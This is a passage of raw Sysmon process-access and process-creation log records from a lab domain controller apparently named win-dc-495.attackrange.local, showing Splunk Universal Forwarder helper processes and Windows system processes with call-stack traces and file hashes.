Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.233{59A5CD1D-9184-6005-B702-00000000A301}17564824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.093{59A5CD1D-9184-6005-B702-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:49.061{59A5CD1D-9184-6005-B802-00000000A301}48762356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:50.014{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 